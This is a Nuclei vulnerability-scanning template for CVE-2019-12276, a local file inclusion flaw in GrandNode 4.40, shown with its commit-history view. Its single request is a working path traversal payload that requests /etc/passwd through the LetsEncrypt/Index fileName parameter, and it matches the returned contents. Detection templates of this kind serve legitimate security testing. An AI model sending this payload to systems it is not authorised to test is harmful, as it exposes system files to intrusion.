nuclei-templates/http/cves/2019/CVE-2019-12276.yaml

42 lines
1.1 KiB
YAML
Raw Normal View History

2021-07-29 22:49:59 +00:00
id: CVE-2019-12276
info:
name: GrandNode 4.40 - Local File Inclusion
2021-07-29 22:49:59 +00:00
author: daffainfo
severity: high
2022-06-20 17:32:16 +00:00
description: |
GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.
reference:
2021-07-29 22:49:59 +00:00
- https://security401.com/grandnode-path-traversal/
- https://grandnode.com
- https://github.com/grandnode/grandnode
- https://nvd.nist.gov/vuln/detail/CVE-2019-12276
remediation: |
A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-12276
cwe-id: CWE-22
2022-06-20 17:32:16 +00:00
tags: cve,cve2019,lfi,grandnode
metadata:
max-request: 1
2021-07-29 22:49:59 +00:00
http:
2021-07-29 22:49:59 +00:00
- method: GET
path:
- "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"
2021-07-31 03:28:19 +00:00
headers:
Connection: close
2021-07-29 22:49:59 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-07-29 22:49:59 +00:00
- type: status
status:
- 200